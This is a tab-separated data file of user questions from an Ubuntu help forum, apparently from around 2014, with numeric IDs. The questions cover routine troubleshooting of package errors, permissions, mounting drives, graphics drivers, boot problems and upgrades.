511918	`` failed to load the package list '' - fixes posted not working	i have a pretty new installation , and this week tried to add a vlc server application . that seems to have broken something , as i now have the warning bar that indicates a `` serious problem . '' digging around it seems to be a failed to load the package list error . so i searched through the forums and found some solutions . those do n't seem to be helping me , though . here 's my latest attempt at fixing this through the terminal https : //www.dropbox.com/s/eyn2joo3jwvx3rz/screenshot % 20from % 202014-08-15 % 2016 % 3a44 % 3a45.png here 's the error window i get . it seems to have some extra information , but i ca n't seem to find the file it refers to . ( sorry - i ca n't post the actual images ; just a link ) https : //www.dropbox.com/s/yydviv42sjajbz2/screenshot % 20from % 202014-08-13 % 2020 % 3a00 % 3a24.png i 'd be really grateful if someone might point me in a good direction for fixing this . my linux knowledge is fairly limited . thanks !
511921	acl 's ownership , permissions	problem : whenever i write a new file/modify a file in my www folder , permissions and ownerships are being reset on that file , sometimes making the server unable to read the files i create . so i need to go to the terminal , set the ownerships etc . which is very tedious . my www folder is accessible through samba . whenever i write or modify anything to that folder i get the permissions and ownership of the file reset to jay : jay that ca n't be read by apache . i looked up online and saw this question . so i tried : sudo setfacl -rdm g : apache : rx www sudo chmod g+s www now the result is this : drwxr-sr-x+ 14 jay apache 4096 aug 15 21:09 www but now whenever i try something like : touch somefile.txt i get these settings : -rw-r -- r -- + 1 jay apache 0 aug 15 23:07 somefile.txt i thought the permissions would keep the folder 's permission , no ? regarding the ownership it is ok , but the permissions are not kept ! say i wanted to make a 750 chmod automatic for jay 's writing to the folder . how would i go about that ? i assume the little 's ' marks the setgid ? does this mean anything written inside of this folder would be given the folder 's group 's ownership ? why does n't it affect my files ? i thought the settings of a newly created file would be just like the containing folder 's ( www ) which is rwxr-xr-x is there a way to simply undo the setfacl ? that is take out the little '+ ' in the permissions line ? i am running ubuntu 12
511922	need to connect as **root @ my-server-ip** with ssh	i have a vps with ubuntu 14.04 . i need to login as root to my server over ssh . i set a password for root : sudo passwd root then enabled it : sudo passwd -u root then rebooted my vps : sudo reboot but i still ca n't connect with the root user . how can i enable ssh login as root ?
511923	ubuntu for android , ubuntu for devices , linuxonandroid project for ubuntu on armv7 machine ?	i 've looked around but ca n't find any solid solutions or help on this topic . i recently ordered a machine with an armv7 cpu ( cortex a-9 , < = 1.6ghz , quad core ) . the machine also has a mali-400 quad-core gpu @ 533 , supposedly , along with 2gb ram and 8gb rom , several usb ports -- one host ( single port hub ? ) . i recently discovered `` ubuntu for android '' ( http : //www.ubuntu.com/phone/ubuntu-for-android ) , as well as ubuntu for devices ( http : //developer.ubuntu.com/start/ubuntu-for-devices/ ) . the latter appears to be more of a mobile experience , whereas i 'm hoping for a 'desktop ' experience . ubuntu for android claims to run alongside android and given that my coming machine is a quad-core armv7 cpu with android 4.1.1 loaded , this interests me greatly and i believe it to be possible , however i can not find appropriately concise documentation . if all i get here is a point in the right direction , i 'll be eternally grateful . i do know that there are similar machines that come with ubuntu preloaded . finally , in the past , i 've run debian in a chroot on my old 800mhz phone with something like 190mb ram . it was an armv6 , therefor there is no ubuntu build for it so i have yet to try it out but debian worked fine* , i 've already got a 12.04 image ready for my armv7 when it gets here , but i will likely need to first obtain access to the root user , although the app gnuroot looks promising to avoid this . i suspect the same will apply for installing ubuntu , unless it involves a straight rom flash.. which i hope not because i doubt anyone has worked on one for this machine.. regardless , i seek council . edit for clarity : i 'm looking to know the most cohesive way to achieve an ubuntu experience on this device . if i have to , i will attempt via the chroot method but if anyone can help me to get *devices or *android happening , that will be my goal . /edit here 's hopin ' the knowledge springs forth*
511928	can i use wired xbox one controller on ubuntu 14.04	can i use wired xbox one controller on ubuntu 14.04 ? googling only gave me xbox 360 controller , and i dont think that the new xbox one controller can be mapped as old 360 one . ( im thinking of buying xbox one controller for my pc )
511929	ubuntu 14.04 brightness keeps going to 100 %	i recently installed ubuntu 14.04 for the first time . although i have set brightness a million times , every time i start the computer , it goes to maximum again . if i restart the computer it remembers my brightness definitions , but i completely turn off , it forgets . how can i get it to remember my preferences ? thank you , cheers .
511930	suspend error on laptop	so i have a dell inspiron 17r 7720 special edition laptop , and i noticed that whenever i open the lid right before it brings me to the login screen , i see these list of errors and a black screen pop up . it does n't prevent me from logging in , and it only last of 5 seconds . i also see it pop up right before i put my computer into suspend when i click the suspend option as it quickly flashes before the computer suspends . here is the best picture i was able to get of the error ( sorry for the blur ) : really do n't know what is going on here , it does not seem to be causing any sorts of problems that are noticable that is . if anyone has a solution it would be greatly appricitated ! thanks and have a great day . update : i took some time to look into finding out what device 00:06 was by going into the terminal and entering : dmesg | grep `` 00:06 '' this came up with these results : [ 0.271993 ] pnp 00:06 : plug and play acpi device , ids pnp0303 ( active ) [ 36.969208 ] pm : device 00:06 failed to restore : error -19 [ 148.726044 ] pm : device 00:06 failed to restore : error -19 [ 2183.755265 ] pm : device 00:06 failed to restore : error -19 i hope that this information will be able to assist you in my problem . thanks again !
511932	hardware audio keyboard keys stopped working	i have hardware `` volume up '' and `` volume down '' on my lenovo thinkpad w530 . they used to work to increase and decrease volume . a day or two ago , they stopped working . xev sees them , in settings > keyboard > shortcuts , they are correctly assigned , i can assign other key combinations to change volume and that works , i can also assign the hardware keys to different actions and that does not work . it works for a guest account . reboot does not help . i am at a loss what might be causing it . any ideas where to look for causes ? this is on 14.04 .
511933	can not boot ubuntu 14.04 installation dvd	after a failed upgrade from 12.04 to 14.04 i tried to re-install ubuntu using the dvd . no matter what i try , try ubuntu or install ubuntu , i get stuck in the boot screen . ( i mean the screen with the ubuntu trademark and the blinking dots . ) pressing f4 reveals : stdin : not a typewriter unable to open '/dev/sdb' bus error i did check the checksum of the dvd iso before burning and i even burnt a second dvd . also , i tried the different compatibility modes ( nomodeset etc. ) . no dice . any help would be greatly appreciated . update : i was able to fix and upgrade the broken installation that i already had . i will not mark this as solved though , as the problem would still exist would i still try to install ubuntu from the dvd .
511935	i cant acces to an external hard drive ( it has windows 8 ) trough my usb cable	i know this problems solves by restarting with windows 8 in an normal mode , but i dont have anymore any windows 8 , im trying to rescue the files that i had in a laptop that it motherboard burned out , and i cant install windows 8 in this one , i only have ubuntu on this machine . the message i get one i try to open this external hard drive is : error mounting /dev/sdb4 at /media/bug/52b0e048b0e0345f : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb4 '' `` /media/bug/52b0e048b0e0345f '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sdb4 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . 多how cand i recover my files from ubuntu ? it says that i cand mount the volume as ro but i dont know how to do that , and i dont know it that would allow me to copy my files . thanks for your time edit : im tryin to mount it from terminal as : sudo mount -o ro /dev/sdc4 at /media/bug/ but i only get information about mount command , what am i doing wrong ? edit : i could solved it with the help of a man named sanctimoniuos ape , i was writing an incomplete command , the right one was : sudo mount -t ntfs -o ro , noatime , nls=utf8 , umask=0222 /dev/sdc4 /media/bug thanks
511936	logging in with a blank screen	i have recently installed amd driver in my hp probook 4540 s machine ... .but after restarting when i logged in using my password it just shows the background nothing ele ... it 's not enabling me to open the terminal also ? how to solve please response it 's urgent
511938	how to enable keyboard when yoga pad 2 is folded as a tablet ?	i have a yoga pad 2 pro , and when i 'm using it 's hdmi port to output to a larger display , i do n't really have any usage for the laptop 's display , so i thought i could turn the display off and fold it up so it would be like a keyboard , but this makes the keyboard turn off . how can i disable this feature ?
511941	installed minimal lxde having problem with software doesnt get added the gksu	hello im having problem with my minimal installation of lxde sofware like synaptic doesnt get the gksu added automaticly infront of its exec=synaptic , and some other software like update-manager doesnt work either as it should without it added auto , however ofc i can add it manually but i reather have it work when i install it . ive installed gksu before i installed any software but still it doesnt add does needed lines in exec=gksu am i missing a piece of crucial software like a policy manager or something ? this is how my installation is after i installed mini.iso from ubuntu 14.04 [ code ] base xserver installation sudo apt-get install xserver-xorg xserver-xorg-core xfonts-base xinit x11-xserver-utils gui sudo apt-get install lxde-core lxde-common lxpolkit lxrandr lxappearance lxappearance-obconf lxsession lxterminal lxtask audio sudo apt-get install pulseaudio pavucontrol loginmanager/displaymanager sudo apt-get install lightdm lightdm-gtk-greeter # sudo apt-get install gksu gdebi printer sudo apt-get install system-config-printer cups foomatic-db [ /code ]
511943	having trouble preventing users from changing wallpaper/settings	i 'm sort of new to linux and i 'm having a problem , i 'm trying to prevent users from changing the desktop wallpaper ( as well as other things but that is the main one ) i know this has been asked before but none of the current topics helped me and i 've been at this for more than a week , they are also kind of old topics . my configuration is : i installed edubuntu 14.04 , installed gnome ( only using gnome for gconf and dconf to get this working , is there a way without gnome ? ) have admin account , a standard account and a guest account , wanting to lock down features on the standard account . i 've already tried doing it in gconf , dconf and using gsettings . i do n't want to use a guest account i 've been trying to use gconf and dconf but it 's just not making sense to me , right now i 'm trying it in dconf because i couldnt get it to work in gconf , i tried setting it as mandatory and default in gconf but it didnt work ( i read that gconf is n't used in the newer versions of ubuntu in favor of dconf , so that 's why i 'm trying dconf ) , right now i 'm trying to do this in dconf again ( the wallpaper part ) i 'm under the impression that i 'm supposed to create a file and put all the info they provide in there , like create the user name/database , then the keyfile ( how do i make it a .d file ? ) , then dconf update file , right ? how do you get it to run after all that ? do i use a text editor like gedit ? i tried going to the directory they said to and nothing is there and i was n't able to make any new files or directory 's in the gui , and i ca n't move a file into there . can you only do that through the terminal ? it would be great if i could restrict it to only the admin able to change settings so i tried this : chmod 744 /usr/bin/gnome-appearance-properties but , i 'm getting : chmod : can not access 'usr/bin/gnome-appearance-properties ' : no such file or directory when i try that . and i would rather not use this , where you put this in the startup applications : gsettings set org.gnome.desktop.background picture-uri `` file : ///usr/share/backgrounds/edubuntu_default.png '' i 've seriously tried all the help topics on the forum about this and many other web sites . please help ! thanks !
511946	display only the git root directory if it is a git directory in ps1	i know you can do something like this for the ps1 : corvid @ ~/github/gitdirectory ( master ) $ but , this might be a bit odd : i want to only show the basename of the git directory , no matter where i am in that directory , prefixed with nothing . if i am not in a git directory , i do not want to display anything for example , if i am home i want it to display : corvid $ if i have entered a git directory , i want it to display : corvid @ git_project ( master ) and if i am moving around within that directory , i do not want it to add anything to the path . so if i am at ~/git/git_project/users/authenticate.py or something , i only want it to display corvid @ git_project ( master ) how can this be achieved with ps1 ?
511947	can someone please eli5 how to install the unity desktop onto my windows 8.1 install ?	as much as i 'd love to , i ca n't use ubuntu for everything , but i want to at least make windows look like my favorite os . i have no idea about the whole software architecture behind unity/x , so i really need a simple explanation .
511948	desparate ! trying to install libgtk1.2 in ubuntu 14.04	i hear that this library file might not exist in the repositories since a few past editions ago , but i really need this version of libgtk for a manual installation of a run file , can not find it with apt-get and repositories that i found so far dont work either i can not add them or installation is not successful or possible . i am at wits end , i think there is even a bug related to this issue from what i read but that may have been the case a while back . short question i need the following library installed : libgtk+-1.2 or something that can do its job because the newer version that i got preinstalled does not seem to help any .
511950	nvidia geforce gt 650m drivers for ubuntu on lenovo y500	i am new to ubuntu . i have used it and installed it on an old pc for my family which works wonderfully even playing simcity 2013 through wine . i am looking to switch my lenovo y500 to ubuntu . currently i am running a dual boot between linux mint and windows 8.1 . my only concern is the gt 650m graphics card n my pc . in mint i get fuzzy lines horizontally across the screen during games and scrolling on the web and need to know that i wont have this problem . can someone give me a tutorial on how to correctly install the graphics drivers please ? thank you . ps i 'm pretty new at this so i 'll need a step by step tutorial .
511951	stops network with windows 7 after a time	i have 2 pc with ubuntu 14.04 . in both i have the same problem . i have samba installed , cifs , and with that networking with a computer with windows 7 home that is my file server ( donâ´t ask why ) . i had previously installed 12.04 and was working great ... until some update . ( no , because i am not always in the place , i can not say when or which update ) the thing is that the network disks starts without problem , every boot or reboot . but the thing is that after a while , not always the same time , the connection with windows stops . i do have internet for example , but i can not access the file server anymore . sometimes also , if i have a file opened , it crashes the system . so , the questions , 1 . does someone has a similar problem and knows how to fix it ? 2 . can someone tell me what can i try to log the problem , or which extra information do you need in order to help you help me solve the problem . thanks .
511952	not enough disk space on / and /boot for upgrade to ubuntu 14.04.1 lts	i am having trouble upgrading to ubuntu 14.04.1 lts , getting a `` not enough free disk space '' error . this is because i do not have enough free disk space on / ( need 3618 m ) and /boot ( need 8397 k ) . i have emptied my trash and removed all of the old linux kernels . more generally , i am concerned about how full / is . $ df -h filesystem size used avail use % mounted on /dev/sda2 19g 16g 2.0g 89 % / udev 7.8g 12k 7.8g 1 % /dev tmpfs 1.6g 940k 1.6g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 7.9g 184k 7.9g 1 % /run/shm /dev/md127p1 917g 169g 702g 20 % /mnt/data0 /dev/sda1 89m 33m 51m 40 % /boot /dev/sda5 892g 289g 558g 35 % /home $ uname -r 3.2.0-67-generic $ dpkg -l | grep linux-image ii linux-image 3.2.0.67.79 generic linux kernel image . ii linux-image-3.2.0-67-generic 3.2.0-67.101 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-generic 3.2.0.67.79 generic linux kernel image $ cat /etc/fstab # /etc/fstab : static file system information . # # use 'blkid -o value -s uuid ' to print the universally unique identifier # for a device ; this may be used with uuid= as a more robust way to name # devices that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda2 during installation # /boot was on /dev/sda1 during installation # /home was on /dev/sda5 during installation # /mnt/data0 was on /dev/md0 during installation # swap was on /dev/sda3 during installation any suggestions on how to handle this would be greatly appreciated . thanks .
511955	can not boot/install linux on msi z87-gd65 & gtx 770 ( i7-4770k )	i have been trying to install ubuntu on my gaming pc ( i use *nix on all my other machines ) for quite a while , never got to it really because everytime i get this problem and ca n't get it to work . so basically the problem is i insert my live usb of 14.04.1 in the computer ( tried front & back usb panels , both usb 3.0 and 2.0 . basically tried all ports ) and booting my computer . i see the mobo 's splash page , then i hold f11 and i see the usb key listed . i selected it , and it boots into the `` try without installing , install ubuntu , disk check , etc '' page . everything is fine up to here . next , when i select any options , the screen just goes black . i have tried to put my monitor 's input from the mother board directly ( usually into my gpu ) , and it did n't work . i have no idea what this could be the problem . i would guess the gpu , but i do n't really know . about a year ago , i had a successful ubuntu ( 13 i think , not too sure ) install with no problem ( except some drivers that i never got time to install ) before getting my windows installation ( as said , this is my only gaming pc , as i do everything on mac and ubuntu for the rest ) .
511957	can i run ubuntu 14.04.1 lts 64 bit in my computer ?	my computer specification processor = > intel core 2 duo e7300 @ 2.66ghz ram = > 3gb ddr2 800mhz graphics = > amd radeon hd 5570 1gb ddr3 hard drive = > 500gb please tell me can i run the ubuntu 14.04.1 lts 64 bit in my computer . thanks in advance .
511958	after do-dist-upgrade i have some problems on my xubuntu	hello guys some weeks ago i did an do-dist-upgrade a virtualbox machine , and now i cant login correctly without getting stuck on logs screens , worst with reboot and shutdown ever get stuck on logs screen , i even googled it and there 's nothing about , now : i think its about upstart ? i read it has some bugs , there is a method to go back `` in time '' or restore the working os ? im also having issues with the shared folder , this does not mount on the boot fstab : -- -- -- -- -- -- -- -- > uuid=39663045-644f-45af-bac7-6845456c13ad / ext4 errors=remount-ro 0 1 uuid=99d61a26-32e6-4639-889e-42eebcf754eb none swap sw 0 0 compartido /home/daniel/shared vboxsf defaults , rw , uid=1000 , gid=1000 0 0 < -- -- -- -- -- -- -- -- -- -- -- - uname -a : linux daniel-easynote-ts11hr 3.13.0-33-generic # 58-ubuntu smp tue jul 29 16:45:05 utc 2014 x86_64 x86_64 x86_64 gnu/linux logs & screenshots - > http : //goo.gl/yo99a4 ( i only have 1 reputation point so cant paste more links ) please help me this is urgent and i am free . sorry for my poor english . att . daniel
511959	thumbnail for folder contains video \ pictures	i have a folder with videos . is there any option to add thumbnail to folder with videos ?
511960	synology file recovery using extundelete	it 's never easy ... build a ubuntu machine for the expressed purpose of recovering deleted files or folders from a synology nas using extundelete . i took one of the raid1 drives out of the synology nas , put it in the ubuntu box and ran the command `` sudo extundelete /dev/sdb5 -- restore-all '' it comes back asking for the ubuntu password . i entered the user password . then it comes back with the error : `` failed to read-only open device `` /dev/sdb5 '' : error code 2133571347 '' . so i tried to mount the partition . it comes back `` unknown file system '' . i verified that i 'm using e2fsprogs version 1.42 ( version 1.41 is required for ext4 file system ) . gparted sees the drive and the partitions . anybody have any thoughts ? ? ? ? ?
511961	blank desktop upon install in virtualbox on windows 8.1	i 've successfully installed debian in my virtualbox on windows 8.1 , but i wished to have ubuntu . my machine is hp envy with intel i7 and 8gb ram , nvidia geforce gt 750m . first strange thing i encountered is that the virtualbox does not offer 64-bit linux os type alternative ( and i actually was not able to run 64-bit debian either ) . i 've installed ubuntu 14.04.1 32-bit . all i saw is a blank desktop . i 've read quite a bit on the issue and tried things . for example i updated nvidia drivers and enabled the unity plug-in by the ccsm . but after i enter my login i still see a blank desktop and can not even envoke a terminal with ctrl-alt-t. dmesg reveals the following : nvidia : module license 'nvidia ' taints kernel . nvidia : module verification failed : signature and/or required key missing - tainting kernel nvrm : no nvidia graphics adapter found ! any ideas how to troubleshoot ?
511963	command not found but file exists	i know this has been a common problem but the answers provided to other questions have n't helped with my current issue . when trying to run a file called srf2obj i get the `` command not found '' response . i can see that the file is there . `` file srf2obj '' returns : gnu awk script , ascii text executable os is installed on virtualbox . any help would be great , thanks .
511969	migrate from 14.04 to 14.04.1 lts	i was using 12.04 lts on my laptop for a few years and early this year ( 2014 ) my laptop died and i got a new one . unfortunately i could not restore my backup image as some of the new hardware ( network devices was the killer ) were not supported . there may have been fixes that i could have employed to overcome this limitation but it is all too late now as i no longer have the 12.04 lts backup image , nor do i want to waste time and effort on retracing my steps - so please do not post suggestions on what i should have done 6 months ago . anyway - i installed a fresh 13.10 desktop and set up all of my applications , scripts , etc from scratch ( with some improvements ) . not long after this 14.04 became available and i let the upgrade happen . i would like to migrate from the 14.04 ( non lts ) environment that i currently have to 14.04.1 lts and have been looking for a supported migration method but ca n't find info about this . i note that there is a migration path from 13.10 to 14.04.1 lts - does anyone know if there is a method to migrate from 14.04 to 14.04.1 lts ?
511972	unable to execute expect script via cron even with the permissions set to 777	i created an expect script that wo n't seem to run when called by cron . i included the full path in cron when calling it as follows . * * * * * /usr/local/sbin/checkforremotetasks > /tmp/checkforremotetasks.output this calls the script checkforremotetasks and exports the results to /tmp/checkforremotetasks.output . the contents of the script are as follows : # ! /usr/bin/expect -f set timeout -1 set env ( term ) vt100 if [ file exists `` /usr/local/sbin/remotetasks/restartmysql '' ] { # # stop apache first spawn apache2ctl stop expect `` # '' spawn service mysql restart expect `` # '' spawn rm /usr/local/sbin/remotetasks/restartmysql expect `` # '' spawn apache2ctl start expect `` # '' } if [ file exists `` /usr/local/sbin/remotetasks/restartapache '' ] { spawn apache2ctl graceful expect `` # '' spawn rm /usr/local/sbin/remotetasks/restartapache expect `` # '' } i have a script on my test server that uploads a file to the /usr/local/sbin/remotetasks/restartmysql file . the file contains one character . the expect script ran by cron ( on my production server ) should check for the restartmysql file and if it finds the file , it should spawn the appropriate commands to stop apache , restart mysql , and then restart apache . it works when i run it manually but not when ran through cron . any help would be appreciated . here is the output of /tmp/checkforremotetasks.output : spawn apache2ctl stop
511975	error while upgrading postgres	ubuntu 14.04 . package manager reported that postgresql was broken . when i tried to upgrade it produced the following error : ( synaptic:30668 ) : glib-critical ** : g_child_watch_add_full : assertion 'pid > 0 ' failed ( reading database ... 377899 files and directories currently installed . ) preparing to unpack ... /postgresql-9.3_9.3.5-0ubuntu0.14.04.1_amd64.deb ... * stopping postgresql 9.3 database server * use of uninitialized value $ info { `` pgdata '' } in -d at /usr/bin/pg_ctlcluster line 354 . use of uninitialized value $ info { `` pgdata '' } in concatenation ( . ) or string at /usr/bin/pg_ctlcluster line 355 . error : is not accessible or does not exist [ fail ] invoke-rc.d : initscript postgresql , action `` stop '' failed . dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg : trying script from the new package instead ... * stopping postgresql 9.3 database server * use of uninitialized value $ info { `` pgdata '' } in -d at /usr/bin/pg_ctlcluster line 354 . use of uninitialized value $ info { `` pgdata '' } in concatenation ( . ) or string at /usr/bin/pg_ctlcluster line 355 . error : is not accessible or does not exist [ fail ] invoke-rc.d : initscript postgresql , action `` stop '' failed . dpkg : error processing archive /var/cache/apt/archives/postgresql-9.3_9.3.5- 0ubuntu0.14.04.1_amd64.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/postgresql-9.3_9.3.5-0ubuntu0.14.04.1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up postgresql-9.3-postgis-2.1 ( 2.1.2+dfsg-2 ) ... dpkg : dependency problems prevent configuration of postgresql-contrib-9.3 : postgresql-contrib-9.3 depends on postgresql-9.3 ( = 9.3.5-0ubuntu0.14.04.1 ) ; however : version of postgresql-9.3 on system is 9.3.4-1. dpkg : error processing package postgresql-contrib-9.3 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : postgresql-contrib-9.3 pgdata variable is assigned in /etc/profile.d and is present in all shells .
511976	kernel broken when i was upgrading ubuntu 12.04 to 14.04	i 'm newbie here and in linux manipulations . so..i was upgrading ubuntu 12.04 to 14.04 by automatic processes and when was installing stage , there was interruption of power . to power on pc after this , message on the terminal was display on screen , but i do n't remember what it was . this was root mode prompt , i reset and to select ubuntu , i received the following message : kernel need found first . i try to access my data by debian , but i have not success because i forgot my root password in debian . i hope that you can help me . : ) sorry my english.. : p
511980	problem with panel of configuration ca n't see more icons for settings dialogs ?	here the image i ca n't see the buttons i was using my ubuntu and now i cant see all menus of configuration ubuntu panel.. please i need help ! ! ubuntu 14.04 unity lts
511982	ubuntu does not reboot	my ubuntu 14.04 lts suddenly to give me a gnu grub menu to select ubuntu , ubuntu advance option , i tried to use dvd to reboot , but it does not reboot from my dvd . i enter 'c ' , it give me command line . with grub > prompt . are there any way to recover this situation of the system ? your help and information is great appreciated , regards , iccsi
511984	playonlinux wo n't download : 14.04	either using commands in konsole ( this answer is given : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? ) , nor from muon software centre ( no response when clicking 'install ' ) . any ideas or tips , please ? cheers , x-man
511986	website video slow/choppy ; somehow fixed it briefly on chrome ( but not on firefox ) , but problem resumed on restart	watching video content on any website ( youtube , news sites , tv sites etc ) the picture is slow/choppy , not at all smooth . the sound is fine . i 'm mainly using chrome , which has the latest flash enabled . the same issue occurs in firefox . when i use chrome ( synched ) in my xp partition all video is good and plays normally . i 'm on a dell 620m with intel core 2 , 1.83ghz , ubuntu 14.04 ( new user of linux ) ; 2gb memory , 66gb ubuntu partition . driver in ubuntu is nouveau display from x.org ( should i change to a nvidia driver as they 're the ones offered in the additional driver list ? ) . cpu runs high since installing ubuntu , around 50-60 % for both processors ; in xp it 's very low , ~0-5 % , even with several chrome tabs open as well as ie . at some stage the video on chrome ( on ubuntu system ) started working normally , but i 'd tried so many things recommended all over the place that i had no idea what had solved the issue , and it did n't seem to matter given that it was working . then after booting the next day the issue reappeared . at no stage has the choppiness of videos on firefox improved . youtube videos are using html , and are choppy also . i 've tried doing most of the things i remember doing yesterday : enabling and disabling flash , clearing cache , reopening browsers , disabling hardware acceleration ( not an option anymore ) , installed hal already , reinstalled ubuntu-restricted extras . ( i 'm unable to find what websites i visited yesterday as i deleted my browsing history ... ) i 'm unable to watch protected content on chrome in spite of trying various fixes . i can watch it in firefox but it 's choppy . thank you very much for any suggestions ( especially simple or detailed ones ) . update : i 've switched to the recommended proprietory driver , nvidia 304 , but there 's no improvement in video playing or the overall slowness of my machine with ubuntu . i do n't know what this means , below , but does it offer any insight as to why my machine is running slow and videos playing laggy ? ~ $ /usr/lib/nux/unity_support_test -p xlib : extension `` nv-glx '' missing on display `` :0 '' . opengl vendor string : nouveau opengl renderer string : gallium 0.4 on nv46 opengl version string : 1.4 ( 2.1 mesa 10.1.3 ) not software rendered : yes not blacklisted : no glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : no gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no
511987	what is the benefit of making a bootable usb ?	i am new in this subject . i want to practice linux commands . i am learning linux , so i need ubuntu . what is the best way to download ?
511990	iscsitarget suddenly broken after upgrade of the 12.04 hardware stack	after an upgrade to the latest hardware stack using ubuntu 12.04 , my iscsi service is not longer operational . the error from the service is such : fatal : module iscsi_trgt not found . i have learned that i might need to reinstall the package iscsitarget-dkms . this package builds a driver during installation . during this build process , it reports an error . here is the relevant output : building module : cleaning build area ... . make kernelrelease=3.13.0-34-generic -c /lib/modules/3.13.0-34-generic/build m=/var/lib/dkms/iscsitarget/1.4.20.2/build ... ... .. ( bad exit status : 2 ) error ! bad return status for module build on kernel : 3.13.0-34-generic ( i686 ) consult /var/lib/dkms/iscsitarget/1.4.20.2/build/make.log for more information . errors were encountered while processing : iscsitarget e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and this is the information provided by make.log : or iscsitarget-1.4.20.2 for kernel 3.13.0-34-generic ( i686 ) fri aug 15 22:07:15 edt 2014 make : entering directory /usr/src/linux-headers-3.13.0-34-generic ld /var/lib/dkms/iscsitarget/1.4.20.2/build/built-in.o ld /var/lib/dkms/iscsitarget/1.4.20.2/build/kernel/built-in.o cc [ m ] /var/lib/dkms/iscsitarget/1.4.20.2/build/kernel/tio.o cc [ m ] /var/lib/dkms/iscsitarget/1.4.20.2/build/kernel/iscsi.o cc [ m ] /var/lib/dkms/iscsitarget/1.4.20.2/build/kernel/nthread.o cc [ m ] /var/lib/dkms/iscsitarget/1.4.20.2/build/kernel/wthread.o /var/lib/dkms/iscsitarget/1.4.20.2/build/kernel/wthread.c : in function ‘worker_thread’ : /var/lib/dkms/iscsitarget/1.4.20.2/build/kernel/wthread.c:73:28 : error : void value not ignored as it ought to be /var/lib/dkms/iscsitarget/1.4.20.2/build/kernel/wthread.c:74:3 : error : implicit declaration of function ‘get_io_context’ [ -werror=implicit-function-declaration ] /var/lib/dkms/iscsitarget/1.4.20.2/build/kernel/wthread.c:74:21 : warning : assignment makes pointer from integer without a cast [ enabled by default ] cc1 : some warnings being treated as errors make [ 2 ] : * [ /var/lib/dkms/iscsitarget/1.4.20.2/build/kernel/wthread.o ] error 1 make [ 1 ] : * [ /var/lib/dkms/iscsitarget/1.4.20.2/build/kernel ] error 2 make : * [ module/var/lib/dkms/iscsitarget/1.4.20.2/build ] error 2 make : leaving directory `/usr/src/linux-headers-3.13.0-34-generic' i am at a loss on how to resolve this issue . any help would be appreciated !
511995	xubuntu 14.04 desktop hiccups after resuming from suspend	after resuming the system from suspend , the desktop freezes for 2 seconds every couple of seconds . the sound works fine with no hiccups , this only concerns the visuals . the system does not crash or break but its mightily irritating . i cant even test or research the issue by myself because i have no idea what terminal commands would troubleshoot this .
511998	dual-boot suddenly not showing grub menu	i have a windows 7 / ubuntu 12.04 dual-boot which i have been using for some time without issue . while booted into windows , my computer froze ( for reasons unknown , just completely locked up 100 % ) , so i did the only thing i could , i turned it off . since then , my computer does not boot correctly . i no longer see a bios init screen , i no longer see a grub menu , i just get a blank screen for about 15 seconds or so , and then the ubuntu login scree pops up . i have tried using update-grub to rebuild my grub config to no effect . i am completely at a loss and urgently need a fix for this . please help d :
512000	unable to mount my passport 1tb hardisk in ubuntu 14.04	when i attach my harddisk , it gives the following message : error mounting /dev/sdb1 at /media/gunnar/my passport : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb1 '' `` /media/gunnar/my passport '' ' exited with non-zero exit status 13 : $ mftmirr does not match $ mft ( record 3 ) . failed to mount '/dev/sdb1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . anyone know what to do about this ? it works just fine with my windows pc . and , - i am the complete amateur with linux commands , so please be gentle with me , and keep it extremely simple . thanks in advance . gunnar să¸rensen , oslo , norway
512001	i upgraded ubunta 14.04 the video is very slow i installed gnome panel	when logging in it did not give me an option to choose anything . someone please help me . i 'm so new at this so make it simple . i have an intel integrated gen 2 video
512004	trying to install magick-rotation on a gateway c-140x	hello i 'm hoping i can get some help here . i have a gateway c-140xl and i just upgraded to 14.04 . i 'm trying to install magick-rotation 1.6.2 . first issue i noticed is that the installer is recognized as and installer . so i read the manual install instructions i get through it except for the part where it unity tray whitelist . try to follow the instruction with either the dconf-editor or gsetting method and both wo n't work . i 'm new to ubuntu and do n't know what i 'm doing wrong . any help would be appreciated . i 'm just trying to find a simple way to get the screen rotation to work on this tablet .
